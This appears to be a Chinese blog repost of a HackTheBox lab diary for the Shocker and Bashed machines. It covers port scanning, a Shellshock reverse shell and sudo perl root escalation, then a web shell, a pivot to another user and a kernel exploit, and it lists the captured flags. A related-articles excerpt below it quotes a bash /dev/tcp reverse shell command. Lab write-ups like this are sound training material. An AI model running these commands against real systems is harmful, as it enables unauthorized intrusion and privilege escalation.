废物的靶场日记 htb-oscp-shocker+bashed

2023-11-05 15:40

本文主要是介绍废物的靶场日记 htb-oscp-shocker+bashed,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

废物的靶场日记 htb-oscp-shocker+bashed

shocker

oscp系列 easy难度的shocker 靶机IP 10.10.10.56

sudo nmap -sV -A -sS -p- --min-rate=5000 10.10.10.56
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

访问80是一个很有CTF风格的页面…
请添加图片描述

直接扫后台文件./dirsearch.py -u 10.10.10.56 -r 扫出来10.10.10.56/cgi-bin/
但是这题的难点就出现了 递归的是扫不出来东西的 这时候需要对后缀进行枚举 -e php,txt,sh,pl,py
扫到10.10.10.56/cgi-bin/user.sh 打开看到

Content-Type: text/plain
Just an uptime test script
02:55:18 up 40 min, 0 users, load average: 0.00, 0.00, 0.00

发现这是shellshock漏洞 查找exp后是在burp里把user-agent改改反弹shell
拿到shell以及user的flag 2ec24e11320026d1e70ff3e16695b233

sudo -l发现perl可以执行 那就直接root sudo perl -e ‘system("/bin/bash")’
拿下root的flag 52c2715605d70c7619030560dc1ca467 打完
请添加图片描述

Bashed

继续 一天两台oscp系列总要做的 easy难度的bashed 靶机IP 10.10.10.68

sudo nmap -sV -A -sS -p- --min-rate=5000 10.10.10.68 -Pn
就开了个80

dirsearch扫了一遍 发现有目录遍历 然后在10.10.10.68/dev下看到了phpbash.php 打开直接就是shell 直接就能拿到user的flag 2c281f318555dbc1b856957c7147bfc1

然后sudo -l 看到 (scriptmanager : scriptmanager) NOPASSWD: ALL

这里我们先nc到kali上 但是会发现怎么都上线不了
猜测就是因为从这个网页端php做的模拟shell到真实机器上会因为一些特殊字符或者引号受影响
所以这里我直接传了一个phpshell过去 然后发现 ./也会乱码 直接php nc.php上线即可

然后 sudo -u scriptmanager bash -i 直接切到scriptmanager上
上传linpeas扫 看到一个CVE-2017-16995 github上下个exp
因为是c的exp gcc编译一下传过去执行就行了 拿下root权限

cc4f0afe3a1026d402ba10329674a8e2

请添加图片描述

这篇关于废物的靶场日记 htb-oscp-shocker+bashed的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/350820

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

HTB-You know 0xDiablos

引言 项目概述:HTB的EASY难度 PWN靶机 You know 0xDiablos https://app.hackthebox.com/challenges/106 本文详细解释了溢出payload的结构以及为什么要这样构造,友好的为想要入手PWN的朋友解释了原理技术点涉及: 32位linux逆向、32位程序调用、栈溢出目标与读者:网络安全兴趣爱好者、PWN新手 基本情况 运行看看

研1日记5

x = torch.tensor(x),numpy 转tensor 三维矩阵相加 screen -S pid 进入之前创建好的screen transpose()只能一次操作两个维度;permute()可以一次操作多维数据,且必须传入所有维度数, transpose()中的dim没有数的大小区分;permute()中的dim有数的大小区分 PyTorch 两大转置函数 trans

【项目日记】高并发内存池---细节优化及性能测试

终此一生,只有两种办法: 要么梦见生活,要么落实生活。 --- 勒内・夏尔 --- 高并发内存池---细节优化及性能测试 1 细节优化1.1 大块内存的申请处理1.2 配合定长池脱离使用new1.3 释放对象无需内存大小 2 调试Debug3 性能测试4 项目总结 1 细节优化 在前面的文章中我们已经实现了高并发内存池的申请内存逻辑和释放内存逻辑:

git svn 日记

1. git log -p -1 --name-only 该命令用于查看最新的一次提交记录的详细信息,包括文件更改情况。 git log:显示 Git 仓库的提交历史。-p:显示每次提交的差异 (diff),也就是文件内容的修改部分。-1:表示只显示最近的一次提交。--name-only:只显示被修改的文件名,而不显示详细的差异内容。 总结:该命令会输出最近一次提交的日志,显示提交的差异内容

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

uniapp微信小程序开发踩坑日记:Pinia持久化报错Cannot read property ‘localStorage‘ of undefined

插件默认使用 localStorage 实现持久化,小程序端不兼容,需要替换持久化 API import { defineStore } from 'pinia'   export const useCommonStore = defineStore('pack-store', {state: (): State => ({wwInfo: {},globalData: {},timerLoc

今麦郎「日记薪·1号发」 即时反馈,激活10000+名基层员工

本文内容整理自红海云CEO孙伟对今麦郎集团人力资源总经理王高峰、IT管理中心副总经理邹大勇的访谈。 坚持创新求变的品牌基因 过去30年,中国食品工业蓬勃发展,孕育出一批批在国际舞台上熠熠生辉的民族品牌。今麦郎作为民族品牌代表,自1994年创立以来,始终紧跟消费者需求变迁,从满足基础温饱的初心出发,逐步迈向品牌塑造、健康倡导及高端化探索的新征程,从家喻户晓的“今麦

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面